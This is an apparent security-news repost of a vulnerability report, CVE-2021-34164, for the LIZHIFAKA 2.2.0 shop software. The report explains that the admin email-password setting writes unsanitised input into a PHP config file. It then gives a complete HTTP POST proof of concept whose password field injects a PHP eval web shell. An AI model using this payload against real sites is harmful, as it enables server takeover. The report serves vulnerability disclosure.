Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-34164: An issue was discovered in LIZHIFAKA 2.2.0 · Issue #22 · lizhipay/faka

Permissions vulnerability in LIZHIFAKA v.2.2.0 allows authenticated attacker to execute arbitrary commands via the set password function in the admin/index/email location.

CVE
#vulnerability#web#windows#php#auth#firefox

Sorry for my bad english

English:
/admin/index/email (Requires admin rights) The setting password option in this location can write arbitrary content to /config/email.php to obtain website permissions
Chinese:
/admin/index/email (需要管理员权限) 后台修改email密码处可以getshell获取网站权限

POC:
POST /admin/api/config/editEmail HTTP/1.1
Host: www.lizhi.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://www.lizhi.top
Connection: close
Referer: http://www.lizhi.top/admin/index/email
Cookie: PHPSESSID=jedhau3007vnla9hjdv228ugdi

smtp=smtp.163.com&port=994&user=admin&pass=admin’,’test’=>"${@eval($_POST[‘a’])};",’a’=>’

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda